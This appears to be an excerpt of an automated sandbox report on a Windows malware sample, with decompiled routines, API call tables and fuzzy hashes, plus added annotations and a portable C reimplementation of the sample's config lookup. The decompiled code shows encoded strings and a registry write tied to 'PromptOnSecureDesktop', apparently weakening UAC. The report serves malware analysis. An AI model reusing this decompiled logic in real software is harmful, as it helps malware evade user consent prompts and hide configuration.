                                                                                                                                  							__eflags =  *(_t51 + 0xc) - _t30;
                                                                                                                                  							if( *(_t51 + 0xc) != _t30) {
                                                                                                                                  								goto L21;
                                                                                                                                  							}
                                                                                                                                  							goto L18;
                                                                                                                                  							L21:
                                                                                                                                  							_t42 =  *_t42;
                                                                                                                                  							__eflags =  *_t42 - 0x4120e4;
                                                                                                                                  						} while ( *_t42 != 0x4120e4);
                                                                                                                                  						goto L22;
                                                                                                                                  					}
                                                                                                                                  					_t47 = 0;
                                                                                                                                  					goto L11;
                                                                                                                                  				} else {
                                                                                                                                  					goto L1;
                                                                                                                                  				}
                                                                                                                                  				do {
                                                                                                                                  					L1:
                                                                                                                                  					_t54 =  *_t41;
                                                                                                                                  					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
                                                                                                                                  						if(_a12 != 0) {
                                                                                                                                  							_t8 = _t54 + 8; // 0x761b43e8
                                                                                                                                  							__eflags = lstrcmpA(_t8, _a12);
                                                                                                                                  						} else {
                                                                                                                                  							_t59 =  *(_t54 + 8);
                                                                                                                                  						}
                                                                                                                                  						if(_t59 == 0) {
                                                                                                                                  							break;
                                                                                                                                  						} else {
                                                                                                                                  							goto L7;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L7:
                                                                                                                                  					_t41 =  *_t41;
                                                                                                                                  					_t53 = 0;
                                                                                                                                  				} while ( *_t41 != 0x4120e8);
                                                                                                                                  				if(_t53 != 0) {
                                                                                                                                  					goto L15;
                                                                                                                                  				}
                                                                                                                                  				goto L9;
                                                                                                                                  			}

                                                                                                                                  0x0040e65a
                                                                                                                                  0x0040e664
                                                                                                                                  0x0040e666
                                                                                                                                  0x0040e66c
                                                                                                                                  0x0040e6a9
                                                                                                                                  0x0040e6b0
                                                                                                                                  0x0040e6b5
                                                                                                                                  0x0040e6c8
                                                                                                                                  0x0040e6d0
                                                                                                                                  0x0040e6d3
                                                                                                                                  0x0040e6d8
                                                                                                                                  0x0040e6de
                                                                                                                                  0x0040e6f5
                                                                                                                                  0x0040e6e0
                                                                                                                                  0x0040e6e5
                                                                                                                                  0x0040e6e9
                                                                                                                                  0x0040e6ef
                                                                                                                                  0x0040e6ef
                                                                                                                                  0x0040e6f9
                                                                                                                                  0x0040e6f9
                                                                                                                                  0x0040e6fe
                                                                                                                                  0x0040e704
                                                                                                                                  0x0040e741
                                                                                                                                  0x0040e743
                                                                                                                                  0x0040e6b9
                                                                                                                                  0x0040e6b9
                                                                                                                                  0x0040e6c4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e709
                                                                                                                                  0x0040e70b
                                                                                                                                  0x0040e70e
                                                                                                                                  0x0040e715
                                                                                                                                  0x0040e715
                                                                                                                                  0x0040e715
                                                                                                                                  0x0040e718
                                                                                                                                  0x0040e71b
                                                                                                                                  0x0040e72c
                                                                                                                                  0x0040e72c
                                                                                                                                  0x0040e72c
                                                                                                                                  0x0040e732
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e736
                                                                                                                                  0x0040e722
                                                                                                                                  0x0040e728
                                                                                                                                  0x0040e72a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e72a
                                                                                                                                  0x0040e710
                                                                                                                                  0x0040e713
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e737
                                                                                                                                  0x0040e737
                                                                                                                                  0x0040e739
                                                                                                                                  0x0040e739
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e6b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e66e
                                                                                                                                  0x0040e66e
                                                                                                                                  0x0040e66e
                                                                                                                                  0x0040e676
                                                                                                                                  0x0040e684
                                                                                                                                  0x0040e68f
                                                                                                                                  0x0040e699
                                                                                                                                  0x0040e686
                                                                                                                                  0x0040e686
                                                                                                                                  0x0040e686
                                                                                                                                  0x0040e69b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e69b
                                                                                                                                  0x0040e69d
                                                                                                                                  0x0040e69d
                                                                                                                                  0x0040e69f
                                                                                                                                  0x0040e6a1
                                                                                                                                  0x0040e6a7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                    • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                    • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                  • lstrcmpA.KERNEL32(761B43E8,00000000,?,761B43E0,00000000,?,00405EC1), ref: 0040E693
                                                                                                                                  • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,761B43E0,00000000,?,00405EC1), ref: 0040E6E9
                                                                                                                                  • lstrcmpA.KERNEL32(?,00000008,?,761B43E0,00000000,?,00405EC1), ref: 0040E722
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                                                                  • String ID: A$ A
                                                                                                                                  • API String ID: 3343386518-686259309
                                                                                                                                  • Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                                                                  • Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
                                                                                                                                  • Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                                                                  • Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                                                                  • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                                                                  • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                                                                  • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: setsockopt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3981526788-0
                                                                                                                                  • Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                                                                  • Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
                                                                                                                                  • Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                                                                  • Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                                                                  				int _v8;
                                                                                                                                  				int _t18;
                                                                                                                                  				intOrPtr _t20;
                                                                                                                                  				CHAR* _t21;
                                                                                                                                  				int _t30;
                                                                                                                                  				CHAR* _t36;
                                                                                                                                  
                                                                                                                                  				_t18 = lstrlenA(_a12);
                                                                                                                                  				_t36 = _a4;
                                                                                                                                  				_v8 = _t18;
                                                                                                                                  				_t20 = _a8 + _t36;
                                                                                                                                  				_a8 = _t20;
                                                                                                                                  				if(_t36 >= _t20) {
                                                                                                                                  					L5:
                                                                                                                                  					_t21 = 0;
                                                                                                                                  				} else {
                                                                                                                                  					while(1) {
                                                                                                                                  						_t30 = lstrlenA(_t36);
                                                                                                                                  						_t7 =  &(_t36[1]); // 0x1
                                                                                                                                  						_a4 = _t30 + _t7;
                                                                                                                                  						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
                                                                                                                                  						if(_t36 < _a8) {
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							goto L5;
                                                                                                                                  						}
                                                                                                                                  						goto L6;
                                                                                                                                  					}
                                                                                                                                  					_t21 = _a4;
                                                                                                                                  				}
                                                                                                                                  				L6:
                                                                                                                                  				return _t21;
			}

Instruction address range of this listing: 0x00402429 to 0x0040247b.

                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                                                                  • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                                                                  • lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
                                                                                                                                  • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$lstrcmpi
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 1808961391-1857712256
                                                                                                                                  • Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                                                                  • Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
                                                                                                                                  • Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                                                                  • Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
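Added example, not code from the sample or from the Joe Sandbox report: a portable C reimplementation of the access pattern the lstrlenA/lstrcmpiA loop in the listing above appears to perform, a case-insensitive key lookup over a packed blob of consecutive "name\0value\0" records whose stride is lstrlenA(name) + lstrlenA(value) + 2. The record layout is an inference from that stride; the key names localcfg and lid_file_upd appear in the report's call arguments, while the values and the blob itself are constructed. Every string length is bounded to the buffer, which the decompiled loop, comparing its cursor against _a8 only after advancing, does not do.

```c
/* Added example (not from the sample or the report): case-insensitive key lookup
 * over a packed blob of consecutive "name\0value\0" records, the access pattern
 * inferred from the lstrlenA/lstrcmpiA loop in the listing above, where the
 * stride is lstrlenA(name) + lstrlenA(value) + 2. Portable C, no Win32 calls.
 * The key names come from the report; values and layout are constructed. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Portable stand-in for lstrcmpiA: ASCII case-insensitive equality test. */
static int name_equals(const char *a, const char *b)
{
    while (*a != '\0' && *b != '\0') {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
        a++;
        b++;
    }
    return *a == '\0' && *b == '\0';
}

/* Returns a pointer to the value stored for `key` inside [blob, blob + len),
 * or NULL if absent. Every string length is bounded to the buffer with
 * memchr, so a truncated trailing record is rejected instead of being
 * followed with strlen() past the end. */
static const char *cfg_lookup(const char *blob, size_t len, const char *key)
{
    const char *p = blob;
    const char *end = blob + len;

    while (p < end) {
        const char *name_nul = memchr(p, '\0', (size_t)(end - p));
        if (name_nul == NULL)
            return NULL;                     /* name runs off the buffer */
        const char *value = name_nul + 1;
        if (value >= end)
            return NULL;                     /* name without a value */
        const char *value_nul = memchr(value, '\0', (size_t)(end - value));
        if (value_nul == NULL)
            return NULL;                     /* value runs off the buffer */

        if (name_equals(p, key))
            return value;

        p = value_nul + 1;                   /* == p + strlen(name) + strlen(value) + 2 */
    }
    return NULL;
}

/* Constructed sample blob: two key names seen in the report plus a decoy.
 * Adjacent literals concatenate after escape processing, so "\0" "1" stays two bytes. */
static const char SAMPLE_BLOB[] =
    "localcfg\0"     "cfg.dat\0"
    "lid_file_upd\0" "1\0"
    "not_a_key\0"    "x\0";
#define SAMPLE_BLOB_LEN (sizeof(SAMPLE_BLOB) - 1)   /* drop the literal's own terminator */

int main(void)
{
    const char *keys[] = { "LOCALCFG", "lid_file_upd", "missing" };
    for (size_t i = 0; i < sizeof(keys) / sizeof(keys[0]); i++) {
        const char *v = cfg_lookup(SAMPLE_BLOB, SAMPLE_BLOB_LEN, keys[i]);
        printf("%-13s -> %s\n", keys[i], v ? v : "(absent)");
    }
    return 0;
}
```

The lookup is case-insensitive on the name only, as lstrcmpiA is; values are returned as stored. Passing a shorter `len` than the blob simulates a truncated dump and makes the function return NULL rather than read beyond the end.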

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB99
                                                                                                                                  • wsprintfA.USER32 ref: 00ADBCEC
                                                                                                                                    • Part of subcall function 00ADADE8: lstrcpyn.KERNEL32(?,?,0000003E), ref: 00ADAE20
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountIncrementInterlockedTicklstrcpynwsprintf
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1085182253-3142137124
                                                                                                                                  • Opcode ID: 820597d01a9478628097e3db4953929dbabae1dcb8fbf00f62f3edaa8e401da7
                                                                                                                                  • Instruction ID: 32f9fdd1eb7b98c302d76a794c74a7ab41879371ef209cd7df9f89d290b4f05c
                                                                                                                                  • Opcode Fuzzy Hash: 820597d01a9478628097e3db4953929dbabae1dcb8fbf00f62f3edaa8e401da7
                                                                                                                                  • Instruction Fuzzy Hash: 87416671910248DFDF25DF54DC85AE93BB6EB08301F21405BFA6682261DB71DA81CF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 92%
			/* Reading of this routine inferred from its API calls and constants (the sample
			 * has no symbols; the E00xxxxxx helper names are the decompiler's):
			 * - E0040DBCF(..., 0x80000000, 3) opens a file: 0x80000000 is GENERIC_READ and 3 is
			 *   OPEN_EXISTING if the helper wraps CreateFileA; the result is compared with
			 *   INVALID_HANDLE_VALUE (0xffffffff) and then passed to GetFileSize/ReadFile/CloseHandle.
			 * - E00402544(dst, src, len, 0xe4, 0xc8) looks like a decoding routine: it is applied
			 *   in place to the file contents and to two embedded strings (7 and 0x14/0x19 bytes long).
			 * - E0040E3CA(..., 0x80000001, name, value): 0x80000001 is HKEY_CURRENT_USER, so this
			 *   appears to be a registry write; the string "PromptOnSecureDesktop" is associated
			 *   with this function (see String ID below).
			 * - E0040EE2A(buf, 0, 0x100) behaves like memset; E0040DD05/E0040DD69 bracket the body
			 *   and, per the subcall list below, use InterlockedExchange and GetCurrentThreadId (a lock).
			 * - The _t37/_t40 arithmetic is the decompiler tracking cdecl stack cleanup (add esp, N). */
			E0040E52E(void* __edx, void* __eflags) {
				long _v4;
				void* __ecx;
				void* _t9;
				void* _t11;
				void* _t17;
				long _t20;
				void* _t23;
				int _t24;
				void* _t28;
				void* _t31;
				void* _t32;
				void* _t37;
				void* _t40;
				void* _t44;
				int _t48;

				_t44 = __eflags;
				_t32 = __edx;
				E0040DD05();                                        /* acquire lock */
				_t28 = E0040DBCF(_t44, 0x80000000, 3);              /* open file read-only */
				_pop(_t31);
				if(_t28 == 0xffffffff) {                            /* INVALID_HANDLE_VALUE: skip straight to the registry part */
					L6:
					/* decode two embedded strings and pass them to the HKEY_CURRENT_USER write */
					_t9 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
					_t11 = E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t9);
					_t40 = _t37 + 0x34;
					if(_t11 == 0) {                                  /* first attempt failed: retry with a different decoded string */
						_t17 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						E0040E3CA(_t32, 0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t17);
						_t40 = _t40 + 0x34;
					}
					E0040EE2A(_t31, 0x4122f8, 0, 0x100);                /* wipe both decoded-string buffers */
					E0040EE2A(_t31, 0x4128f8, 0, 0x100);
					E0040DD69();                                     /* release lock */
					return 1;
				}
				_t20 = GetFileSize(_t28, 0);
				_v4 = _t20;
				if(_t20 != 0) {                                      /* only the zero case is checked, not INVALID_FILE_SIZE */
					E0040DB2E(_t20);                                 /* presumably allocates _t20 bytes; pointer appears in *0x4136c4 */
					_t23 =  *0x4136c4;
					_pop(_t31);
					if(_t23 != 0) {
						_t31 =  &_v4;
						/* read the whole file; _v4 is overwritten with the number of bytes actually read */
						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
						_t48 = _t24;
						if(_t24 != 0) {
							E00402544( *0x4136c4,  *0x4136c4, _v4, 0xe4, 0xc8);   /* decode in place */
							E0040E332(_t32, _t48,  *0x4136c4, _v4);              /* consume the decoded contents */
							_t37 = _t37 + 0x1c;
						}
					}
				}
				CloseHandle(_t28);
				goto L6;
			}

Instruction address range of this listing: 0x0040e52e to 0x0040e653.

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                    • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                    • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,761B43E0,?,00000000,?,0040A445), ref: 0040E558
                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,761B43E0,?,00000000,?,0040A445), ref: 0040E583
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,761B43E0,?,00000000,?,0040A445), ref: 0040E5B2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3683885500-2980165447
                                                                                                                                  • Opcode ID: 7ecd9c3cf8a4b361ad33475d59cc5a64982076f142c0ea8303aebe1deb81fc45
                                                                                                                                  • Instruction ID: 336cca8f28a0ae06816d6806ca3c094c6326420f96deeb8fe64773c8e7208e17
                                                                                                                                  • Opcode Fuzzy Hash: 7ecd9c3cf8a4b361ad33475d59cc5a64982076f142c0ea8303aebe1deb81fc45
                                                                                                                                  • Instruction Fuzzy Hash: F321EAB19402047AE2207B639C0AFAB3D1CDF54758F10093EBA09B11E3E9BDD96082BD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00ADDF6C: GetCurrentThreadId.KERNEL32 ref: 00ADDFBA
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00410170,?,00000000,?,00ADA6AC), ref: 00ADE7BF
                                                                                                                                  • ReadFile.KERNEL32(00000000,004136C4,00000000,?,00000000,?,00410170,?,00000000,?,00ADA6AC), ref: 00ADE7EA
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00410170,?,00000000,?,00ADA6AC), ref: 00ADE819
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCurrentHandleReadSizeThread
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 1396056608-2980165447
                                                                                                                                  • Opcode ID: 7902eb09b18f90ff15814c2c52a49d831fada2081c22b3094fea9a8900fad251
                                                                                                                                  • Instruction ID: 3d26e26e52633f4399125c5aa1647c2fe7d39c510be2adf003fbe8d832dcd45f
                                                                                                                                  • Opcode Fuzzy Hash: 7902eb09b18f90ff15814c2c52a49d831fada2081c22b3094fea9a8900fad251
                                                                                                                                  • Instruction Fuzzy Hash: 1D21A3B1A403007AE221B7219D47FAB3E5CDB65B60F140026BA0FA92D3FAA5995082F5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 9bd7b0dc4f59437fa338d34710ca8e2c81e896d95e6ef907c3f8ae10e9d6a8c9
                                                                                                                                  • Instruction ID: 509e828b3008e3aab81c55c070a8947765e217c103e4db72dccbab3868dfdeb3
                                                                                                                                  • Opcode Fuzzy Hash: 9bd7b0dc4f59437fa338d34710ca8e2c81e896d95e6ef907c3f8ae10e9d6a8c9
                                                                                                                                  • Instruction Fuzzy Hash: 614125F0E001299FDB64CF49D881BAEB7B4FF85314F40419AE188AB240C7785E85CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 61246dd1e5bb9ccefb6228f064231130c087d5401c6c3a0fea95b2c5d12e6320
                                                                                                                                  • Instruction ID: d1c1bcbb0fab2d3620b9ffaf9ec68e89214f902ffa806ae79501c52aa73867b1
                                                                                                                                  • Opcode Fuzzy Hash: 61246dd1e5bb9ccefb6228f064231130c087d5401c6c3a0fea95b2c5d12e6320
                                                                                                                                  • Instruction Fuzzy Hash: 304106F1E001299FEF64CF49D881BAEB7B5FB85314F4445AAE188AB241C7385E81CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 75c292081e2062ca91706fb0122c83371ae2ef76ec994ce6af73df16e36eddb2
                                                                                                                                  • Instruction ID: 42106033806ea7bb90f00517d68dc85ba1b5828fe851184c900f6de1efba4c70
                                                                                                                                  • Opcode Fuzzy Hash: 75c292081e2062ca91706fb0122c83371ae2ef76ec994ce6af73df16e36eddb2
                                                                                                                                  • Instruction Fuzzy Hash: ED41E2B1E05629DFEB24CF58DC89BAEB7B5FB84304F64859AD049A7240C7789E80CF44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 2124759748-2366072709
                                                                                                                                  • Opcode ID: a4405a0418a309f27a5e5bf6895064569a008f80a4daf4c408bae2a5a01e09e0
                                                                                                                                  • Instruction ID: 6145f39c6fd3fe5de38c2efc57b572788e451d6dd513c70c114c2fbd8dd523f2
                                                                                                                                  • Opcode Fuzzy Hash: a4405a0418a309f27a5e5bf6895064569a008f80a4daf4c408bae2a5a01e09e0
                                                                                                                                  • Instruction Fuzzy Hash: 2341E5B1E05228DFDB24CF58D889BAEB7B5BB85304F6481DAD009A7240C7789E80CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 2124759748-2366072709
                                                                                                                                  • Opcode ID: 8b06dbf1418790fe7afe7a6ed779bba85cdcfbb89dc6132216bc6d4adfe29cb4
                                                                                                                                  • Instruction ID: afea4893869f5e44770ec48f1c12b1aa2fdc6b311f9b05f0b74501ba197f70af
                                                                                                                                  • Opcode Fuzzy Hash: 8b06dbf1418790fe7afe7a6ed779bba85cdcfbb89dc6132216bc6d4adfe29cb4
                                                                                                                                  • Instruction Fuzzy Hash: 8B4126F1E001299FDB64CF49D881BAEB7B4BB85314F4045DAE288A7201C7385E81CF1A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADB9D9
                                                                                                                                  • InterlockedIncrement.KERNEL32(00413648), ref: 00ADBA3A
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBA94
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB79
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADBB99
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00ADBE15
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 00ADBEB4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
